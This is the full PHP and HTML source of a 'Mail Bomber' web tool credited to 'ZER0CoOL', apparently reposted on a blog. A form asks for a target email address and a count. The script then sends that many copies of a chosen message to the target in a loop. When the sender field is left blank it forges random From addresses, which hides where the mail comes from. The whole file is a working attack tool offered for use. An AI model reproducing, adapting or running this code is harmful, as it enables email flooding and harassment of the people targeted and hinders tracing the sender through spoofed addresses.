<html>
<head>
<title>By ZER0CoOL – ZER0CoOL.by.ru</title>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
</head>
<body>
<?php
function RandomEmail($length) {
// all the chars we want to use
$all = explode(” “,
“a b c d e f g h i j k l m n o p q r s t u v w x y z ”
.”A B C D E F G H I J K L M N O P Q R S T U V W X Y Z ”
.”0 1 2 3 4 5 6 7 8 9″);
for($i=0;$i<$length;$i++) {
srand((double)microtime()*1000000);
$randy = rand(0, 61);
$email .= $all[$randy];
}
return $email;
}
//first check to see if they have pressed the login button
if ($_POST['SendMail'])
{
// retrieve the variables entered into the (submitted) form
$targetemail = $_POST['txtTargetEmail'];
$fromemail = $_POST['txtFromEmail'];
$subject = $_POST['txtsubject'];
$message = $_POST['txtmessage'];
$bomblength = $_POST['txtbomblength'];
if (empty($fromemail)) {$EmailGen = 1;}
if (is_numeric($bomblength))
{
if (!empty($targetemail))
{
for($i=0;$i<$bomblength;$i++)
{
if ($EmailGen == 1)
{
$fromemail = RandomEmail(8);
$fromemail .= “@”;
$fromemail .= RandomEmail(4);
$fromemail .= “.com”;
}
mail($targetemail, $subject, $message, “From: $fromemail\n”);
}
echo “<center><h3>”.$bomblength.” Email’s Sent</h3></center>”;
}else{echo”<center><h3>Please Select a Target Email Adress</h3></center>”;}
}else{echo”<center><h3>Please Enter A Numeral For The Number of Bombs</h3></center>”;}
}
?>
<div align=”center”>
<h2>.::ZER0CoOL::. PHP Mail Bomber</h2>
<br /><br />
<form action=’<?echo basename($_SERVER['PHP_SELF']);?>’ method=’post’ name=’SendMail’>
<table border=”0″ cellspacing=”0″ cellpadding=”0″>
<tr>
<td>Target’s Email:</td>
<td><input name=”txtTargetEmail” type=”text” id=”txtTargetEmail”></td>
<td> </td>
</tr>
<tr>
<td>From Email:</td>
<td><input type=”text” name=”txtFromEmail”></td>
<td> If Left Blank, Email will be Automatically Generated.</td>
</tr>
<tr>
<td>Subject:</td>
<td><input type=”text” name=”txtsubject”></td>
<td> </td>
</tr>
<tr>
<td>Message:</td>
<td><textarea name=”txtmessage” cols=”30″ rows=”8″></textarea></td>
<td> </td>
</tr>
<tr>
<td>Number Of Mails:</td>
<td><input name=”txtbomblength” type=”text” value=”1″></td>
<td> Note: Must be number.</td>
</tr>
<tr>
<td colspan=”2″ align=”center”>
<input type=”reset” name=”Reset” value=”Reset”>
<input type=”submit” name=”SendMail” value=”Submit”>
</td>
</tr>
</table>
</form>
<br /><br />
Powered By >ZER0CoOL< ( WwW.ZER0CoOL.by.ru )<br />
Copyright: 2009<br />
<a href=”http://www.ZER0CoOL.by.ru”>www.ZER0CoOL.by.ru</a>
</div>
</body>
</html>

Categories
Tag Cloud
Blog RSS
Comments RSS

Void
Life
Earth
Wind
Water
Fire « Default
Light 